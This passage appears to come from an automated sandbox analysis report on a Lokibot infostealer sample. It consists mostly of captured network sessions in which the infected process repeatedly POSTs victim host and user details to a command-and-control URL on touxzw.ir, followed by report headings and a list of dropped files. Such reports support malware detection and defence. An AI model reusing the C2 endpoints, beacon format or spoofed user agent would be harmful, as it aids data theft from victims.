Feb 20, 2025 03:44:17.017465115 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0byYegqHwbK35ecGBWzWJtnW8zt8Omp4NNSRkJowScg37Fe0qm9bRAVbm095t8HSBZc%2BhO8CJuaMt7DM5nt%2BzQicWkhnqTORHc3xPZO%2B8PtIZPMQiEDoEp5ECk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b2763fd190fa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1656&rtt_var=828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49819	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:18.175738096 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:18.180783033 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:18.948215008 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:44:18 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rq1qsg0YCG%2B0xOdM4y9bIKZ5YptjWJn78BZ3wka2L0SfrMx%2Bg7HVzxXyLxpADoYpqTRMnxxPBkazSUM4PJ9L1VAbjc%2FASGEB7EX%2B9vvXrH%2Fszwzjqz2GJmV4EXM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b277068f943eb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49829	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:20.110713005 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:20.117513895 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:20.910202980 CET	854	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fuUOh1ceCDbq2HS%2B5Pf%2BFfB%2FGo%2BwKFO4%2FGV0LiZn6P%2BbdIkU1oxxW3mRFTBCOkEhfAq6OUMPC04jQrsTx3RFX4oGmq4Mew%2F%2FuoAs0JftJC8%2BClGJrekfM1CeW1o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b277c4a670f39-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1696&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49840	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:22.074762106 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:22.080002069 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:22.852338076 CET	837	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:44:22 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9aDNiQAVpXft%2BG%2FGzKcmze7U57%2FQR%2BsnaVQlA4kRMcF%2BAYKTeTe%2FA5dqzHUpmtQapr%2BW%2FZQn8%2FplZwjFpV50KtPzp%2BVWbjmjfYxNqNHtihWeWrHrmwIPGcaC%2Bs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b27887dd372a5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3441&min_rtt=3441&rtt_var=1720&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49854	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:24.000293016 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:24.005440950 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:24.819494963 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptuIUR75KS8tw8bcDb%2BFcSUMLmTh3EhuCrygmIuj0In3xq8Ip43ilIcnEpNiEzCA0okudKLOgbB8xBuIAbg%2FWpw2NA4XngcSF%2BK6yMLUMOByvTG9iZNRhY%2BABhQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b279479af5e72-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49868	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:25.980731010 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:25.986831903 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:26.634171009 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IDihoqYqU67S5uetcitVK4UHIb5KsagWtykkjCcLkasFca%2FaK%2F44yFbyZtajJnA38%2Bv%2FiFFLW%2FwvE81kesCkRitltWoKcK5RkJgFtAob0mO%2FX7XQT0u3nc5SSFY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b27a0eb984385-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1808&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49881	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:27.780179024 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:27.785264015 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:28.528862953 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:44:28 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zqd83%2F6r5Jqak7ynK56J3qbMdPiYH9uBwE%2BYNYQc0pebOuZF6JXX6srZO%2Fe3d0rCoNou5Zb0dVG%2FuIaeo5%2BAq4TOUT4q2mO9yRel0COEvt65agvOkydbKMlE8R4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b27ac1cd842ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1740&rtt_var=870&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49892	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:29.670077085 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:29.675257921 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:30.431359053 CET	815	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:44:30 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8IcAJPJCQ88tE0oiQyMVrLcLq6wP4v8XshiGCW0zFrwNKmEiNNaDi5%2Fja3P6tHcIZ8v0STsD54Ejck5INly89CfVbST17J3Yv1qZTX5EkHyLnom5QznPjdFa7U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b27b7e9240f43-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49908	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:31.760562897 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:31.765736103 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:32.663177967 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7NrRZsfZ%2FhuBDCUT22ML6PVv0vgDoI4oSb3qllq17WHUiuvntXghTk1k%2B6jW1BAWoGNClUT3tnWDmxL%2FBB7tbHPPhVgKl5g1ck8arTqV3XzgZvqHJ06uh6XbqI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b27c56afa9e17-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=30155&min_rtt=30155&rtt_var=15077&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49922	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:33.828871012 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:33.834170103 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:34.661083937 CET	841	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QlVnKP8fxsZK4M7JWBoQelzMfh6m4xCl%2FWTRBp2PDTaDAE0bYJTiO33cQ57tnXt%2Fc0SLRkfDfZZJ7cjQbv1ZSY4BBnsiXDTgDlO4mg9jHKtPH6ykNlOprQC2nRc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b27d1fb6b8c17-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2851&min_rtt=2851&rtt_var=1425&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49934	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:35.816777945 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:35.821784973 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:36.566781044 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:44:36 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iBVXC3RL1ph0WEeaQHS8QfqlvRJJs5z8FaSJPnQEvalSloGDkzVex9ZcL5WKP2pQC3SwV49QaFngYURzt02NoNHJET%2BoSRAzZPkbn1BmQuXt0v7hrdi1nuOfQVg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b27de6c2d432c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1751&rtt_var=875&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49946	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:37.733357906 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:37.738492012 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:38.559964895 CET	841	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iT0sYfpk1bLk7UjA7KyekZm5MXTgwsTbmBPqrpYKaUYHQkgzhiN67didNpyIzDUwYiNIGfyuWwvho1MmEe69xEf5U5SrfIO%2Bhcf%2BtkgMY4rWZzHriXZSgQL8eKE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b27ea5e1f8c93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4099&min_rtt=4099&rtt_var=2049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49958	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:39.717734098 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:39.722811937 CET	149	OUT

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report vsf098633534.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Keily

C:\Users\user\AppData\Local\Temp\aut1863.tmp

C:\Users\user\AppData\Local\Temp\aut18B2.tmp

C:\Users\user\AppData\Local\Temp\unspawned

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
vsf098633534.exe